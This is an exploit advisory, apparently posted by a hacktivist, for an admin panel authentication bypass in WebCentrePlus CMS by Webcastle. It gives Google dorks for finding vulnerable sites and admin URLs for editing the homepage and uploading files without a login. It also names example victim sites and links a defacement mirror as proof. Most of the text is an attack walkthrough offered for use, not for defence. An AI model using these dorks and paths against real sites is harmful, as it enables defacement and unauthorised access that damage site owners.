#################################################################################
# Exploit Title : Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Unencoded Admin Control Panel ByPass Vulnerability
# Author : KingSkrupellos from Cyberizm.Org Digital Security Technological Turkish Moslem Army
# Vendor Homepages => webcentreplus.com - webcastle.co.uk
# Date: 22/05/2018
# Exploit Risk : Medium
#################################################################################
# Exploit Title : Copyright © 2018 WebCentrePlus CMS by Webcastle Insecure Unencoded Admin Control Panel ByPass and Wysiwyg Editor Vulnerability
# Google Dork => intext:''Copyright © 2018 WebCentrePlus''
# Google Dork => intext:''CMS by Webcastle''
# Exploit => ...../admin/siteContent/index.html
# You can edit website Homepage via => ...../admin/siteContent/editText.html?id=1
# You will see your index on the homepage of the site.
# Admin Panel without username and password [ Screenshot ] => cdn.pbrd.co/images/Hmow6lo.png
# Secondly you can upload and image on the website without any authorization.
# ....../admin/siteContent/uploadDynamic.html
Guidelines : You can upload images of type GIF, JPG or PNG only. Remember that large images will take a while to download.
Note : It says => You must specify a new image file and a name. Please complete the missing information below and click 'Upload'.
# ...../images/upload/dynamic/RANDOM-NUMBERS.png .jpg .gif
or your uploaded image file goes to this path
# ...../images/upload/RANDOM-NUMBERS.png .jpg .gif
#################################################################################
# Example Site :
# nowlogiXt.com/admin/siteContent/index.html
# linXuxtrial.com/admin/siteContent/index.html
# Example Mirror [ Proof ] => archive.is/M8jdH
#################################################################################
# Discovered By : KingSkrupellos from Cyberizm.Org
# Greetings : All Moslem Hackers and Cyberizm Digital Security Team